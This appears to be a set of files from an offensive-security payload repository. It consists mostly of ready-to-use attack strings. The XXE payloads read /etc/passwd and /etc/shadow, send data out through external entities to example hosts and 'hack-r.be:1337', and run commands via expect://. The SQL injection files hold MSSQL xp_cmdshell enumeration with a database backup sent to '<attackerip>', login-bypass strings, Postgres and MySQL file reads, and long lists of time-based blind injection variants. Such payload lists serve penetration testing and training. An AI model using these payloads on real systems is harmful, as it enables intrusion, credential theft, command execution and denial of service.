# XML External Entity (XXE) Injection Payloads * XXE : Classic XXE ``` <?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <data>&file;</data> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> ``` * XXE: Basic XML Example ``` <!--?xml version="1.0" ?--> <userInfo> <firstName>John</firstName> <lastName>Doe</lastName> </userInfo> ``` * XXE: Entity Example ``` <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY example "Doe"> ]> <userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo> ``` * XXE: File Disclosure ``` <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]> <userInfo> <firstName>John</firstName> <lastName>&ent;</lastName> </userInfo> ``` * XXE: Denial-of-Service Example ``` <!--?xml version="1.0" ?--> <!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol; <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> <tag>&lol9;</tag> ``` * XXE: Local File Inclusion Example ``` <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> ``` * XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) ``` <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY % xxe SYSTEM "file:///etc/passwd"> <!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo> ``` * XXE: Access Control Bypass (Loading Restricted Resources - PHP example) ``` <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]> <foo><result>&ac;</result></foo> ``` * XXE:SSRF ( Server Side Request Forgery ) Example ``` <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo> ``` * XXE: (Remote Attack - Through External Xml Inclusion) Exmaple ``` <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY test SYSTEM "https://example.com/entity1.xml">]> <lolz><lol>3..2..1...&test<lol></lolz> ``` * XXE: UTF-7 Exmaple ``` <?xml version="1.0" encoding="UTF-7"?> +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` * XXE: Base64 Encoded ``` <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/> ``` * XXE: XXE inside SOAP Example ``` <soap:Body> <foo> <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]> </foo> </soap:Body> ``` * XXE: XXE inside SVG ``` <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"> <image xlink:href="expect://ls"></image> </svg> ```
Text
h4cker/more_payloads/SQLi/mssql-enumeration.txt
select @@version select @@servernamee select @@microsoftversione select * from master..sysserverse select * from sysusers exec master..xp_cmdshell 'ipconfig+/all' exec master..xp_cmdshell 'net+view' exec master..xp_cmdshell 'net+users' exec master..xp_cmdshell 'ping+<attackerip>' BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
Text
h4cker/more_payloads/SQLi/mysql-injection-login-bypass.txt
<username>' OR 1=1-- 'OR '' = ' Allows authentication without a valid username. <username>'-- ' union select 1, '<user-fieldname>', '<pass-fieldname>' 1-- 'OR 1=1--
Text
h4cker/more_payloads/SQLi/mysql-read-local-files.txt
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
Text
h4cker/more_payloads/SQLi/postgres-enumeration.txt
select version(); select current_database(); select current_user; select session_user; select current_setting('log_connections'); select current_setting('log_statement'); select current_setting('port'); select current_setting('password_encryption'); select current_setting('krb_server_keyfile'); select current_setting('virtual_host'); select current_setting('port'); select current_setting('config_file'); select current_setting('hba_file'); select current_setting('data_directory'); select * from pg_shadow; select * from pg_group; create table myfile (input TEXT); copy myfile from '/etc/passwd'; select * from myfile;copy myfile to /tmp/test;
Text
h4cker/more_payloads/SQLi/sql-blind-MSSQL-INSERT.txt
)%20waitfor%20delay%20'0:0:20'%20/* )%20waitfor%20delay%20'0:0:20'%20-- ')%20waitfor%20delay%20'0:0:20'%20/* ')%20waitfor%20delay%20'0:0:20'%20-- ")%20waitfor%20delay%20'0:0:20'%20/* ")%20waitfor%20delay%20'0:0:20'%20-- ))%20waitfor%20delay%20'0:0:20'%20/* ))%20waitfor%20delay%20'0:0:20'%20-- '))%20waitfor%20delay%20'0:0:20'%20/* '))%20waitfor%20delay%20'0:0:20'%20-- "))%20waitfor%20delay%20'0:0:20'%20/* "))%20waitfor%20delay%20'0:0:20'%20-- ,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL)%20waifor%20delay%20'0:0:20'%20/* ',NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL)%20waifor%20delay%20'0:0:20'%20/* '),NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* '),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20-- "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/* "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
Text
h4cker/more_payloads/SQLi/sql-blind-MSSQL-WHERE.txt
waitfor delay '0:0:20' /* waitfor delay '0:0:20' -- ' waitfor delay '0:0:20' /* ' waitfor delay '0:0:20' -- " waitfor delay '0:0:20' /* " waitfor delay '0:0:20' -- ) waitfor delay '0:0:20' /* ) waitfor delay '0:0:20' -- )) waitfor delay '0:0:20' /* )) waitfor delay '0:0:20' -- ))) waitfor delay '0:0:20' /* ))) waitfor delay '0:0:20' -- )))) waitfor delay '0:0:20' /* )))) waitfor delay '0:0:20' -- ))))) waitfor delay '0:0:20' -- )))))) waitfor delay '0:0:20' -- ') waitfor delay '0:0:20' /* ') waitfor delay '0:0:20' -- ") waitfor delay '0:0:20' /* ") waitfor delay '0:0:20' -- ')) waitfor delay '0:0:20' /* ')) waitfor delay '0:0:20' -- ")) waitfor delay '0:0:20' /* ")) waitfor delay '0:0:20' -- '))) waitfor delay '0:0:20' /* '))) waitfor delay '0:0:20' -- "))) waitfor delay '0:0:20' /* "))) waitfor delay '0:0:20' -- ')))) waitfor delay '0:0:20' /* ')))) waitfor delay '0:0:20' -- ")))) waitfor delay '0:0:20' /* ")))) waitfor delay '0:0:20' -- '))))) waitfor delay '0:0:20' /* '))))) waitfor delay '0:0:20' -- "))))) waitfor delay '0:0:20' /* "))))) waitfor delay '0:0:20' -- ')))))) waitfor delay '0:0:20' /* ')))))) waitfor delay '0:0:20' -- ")))))) waitfor delay '0:0:20' /* ")))))) waitfor delay '0:0:20' --
Text
h4cker/more_payloads/SQLi/sql-blind-MySQL-INSERT.txt
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- +if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- '+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23 "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/* "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20-- "+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
Text
h4cker/more_payloads/SQLi/sql-blind-MySQL-ORDER_BY.txt
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
Text
h4cker/more_payloads/SQLi/sql-blind-MySQL-WHERE.txt
and 0=benchmark(3000000,MD5(1))%20/* and 0=benchmark(3000000,MD5(1))%20-- and 0=benchmark(3000000,MD5(1))%20%23 ' and 0=benchmark(3000000,MD5(1))%20/* ' and 0=benchmark(3000000,MD5(1))%20-- ' and 0=benchmark(3000000,MD5(1))%20%23 " and 0=benchmark(3000000,MD5(1))%20/* " and 0=benchmark(3000000,MD5(1))%20-- " and 0=benchmark(3000000,MD5(1))%20%23 ) and 0=benchmark(3000000,MD5(1))%20/* ) and 0=benchmark(3000000,MD5(1))%20-- ) and 0=benchmark(3000000,MD5(1))%20%23 )) and 0=benchmark(3000000,MD5(1))%20/* )) and 0=benchmark(3000000,MD5(1))%20-- )) and 0=benchmark(3000000,MD5(1))%20%23 ))) and 0=benchmark(3000000,MD5(1))%20/* ))) and 0=benchmark(3000000,MD5(1))%20-- ))) and 0=benchmark(3000000,MD5(1))%20%23 )))) and 0=benchmark(3000000,MD5(1))%20/* )))) and 0=benchmark(3000000,MD5(1))%20-- )))) and 0=benchmark(3000000,MD5(1))%20%23 ') and 0=benchmark(3000000,MD5(1))%20/* ') and 0=benchmark(3000000,MD5(1))%20-- ') and 0=benchmark(3000000,MD5(1))%20%23 ") and 0=benchmark(3000000,MD5(1))%20/* ") and 0=benchmark(3000000,MD5(1))%20-- ") and 0=benchmark(3000000,MD5(1))%20%23 ')) and 0=benchmark(3000000,MD5(1))%20/* ')) and 0=benchmark(3000000,MD5(1))%20-- ')) and 0=benchmark(3000000,MD5(1))%20%23 ")) and 0=benchmark(3000000,MD5(1))%20/* ")) and 0=benchmark(3000000,MD5(1))%20-- ")) and 0=benchmark(3000000,MD5(1))%20%23 '))) and 0=benchmark(3000000,MD5(1))%20/* '))) and 0=benchmark(3000000,MD5(1))%20-- '))) and 0=benchmark(3000000,MD5(1))%20%23 "))) and 0=benchmark(3000000,MD5(1))%20/* "))) and 0=benchmark(3000000,MD5(1))%20-- "))) and 0=benchmark(3000000,MD5(1))%20%23 ')))) and 0=benchmark(3000000,MD5(1))%20/* ')))) and 0=benchmark(3000000,MD5(1))%20-- ')))) and 0=benchmark(3000000,MD5(1))%20%23 ")))) and 0=benchmark(3000000,MD5(1))%20/* ")))) and 0=benchmark(3000000,MD5(1))%20-- ")))) and 0=benchmark(3000000,MD5(1))%20%23
Markdown
h4cker/networking/README.md
